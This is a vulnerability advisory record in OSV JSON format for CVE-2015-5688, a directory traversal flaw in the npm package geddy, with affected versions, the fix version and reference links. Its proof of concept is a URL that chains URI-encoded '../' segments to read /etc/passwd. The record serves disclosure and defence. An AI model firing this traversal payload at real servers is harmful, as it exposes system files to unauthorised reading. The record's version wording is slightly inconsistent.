原始 OSV JSON
{
"id": "GHSA-333x-9vgq-v2j4",
"aliases": [
"CVE-2015-5688"
],
"details": "Versions 13.0.8 and earlier of geddy are vulnerable to a directory traversal attack via URI encoded attack vectors.\n\n### Proof of Concept\n```\nhttp://localhost:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd\n```\n\n\n## Recommendation\n\nUpdate geddy to version >= 13.0.8",
"summary": "Directory Traversal in geddy",
"affected": [
{
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "13.0.8"
}
]
}
],
"package": {
"name": "geddy",
"ecosystem": "npm"
}
}
],
"modified": "2021-08-31T20:33:50Z",
"severity": [],
"published": "2017-10-24T18:33:36Z",
"references": [
{
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5688",
"type": "ADVISORY"
},
{
"url": "https://github.com/geddy/geddy/issues/697",
"type": "WEB"
},
{
"url": "https://github.com/geddy/geddy/pull/699",
"type": "WEB"
},
{
"url": "https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231",
"type": "WEB"
},
{
"url": "https://github.com/advisories/GHSA-333x-9vgq-v2j4",
"type": "ADVISORY"
},
{
"url": "https://github.com/geddy/geddy",
"type": "PACKAGE"
},
{
"url": "https://github.com/geddy/geddy/releases/tag/v13.0.8",
"type": "WEB"
},
{
"url": "https://www.npmjs.com/advisories/10",
"type": "WEB"
}
],
"schema_version": "1.4.0",
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"severity": "HIGH",
"github_reviewed": true,
"nvd_published_at": null,
"github_reviewed_at": "2020-06-16T20:53:48Z"
}
}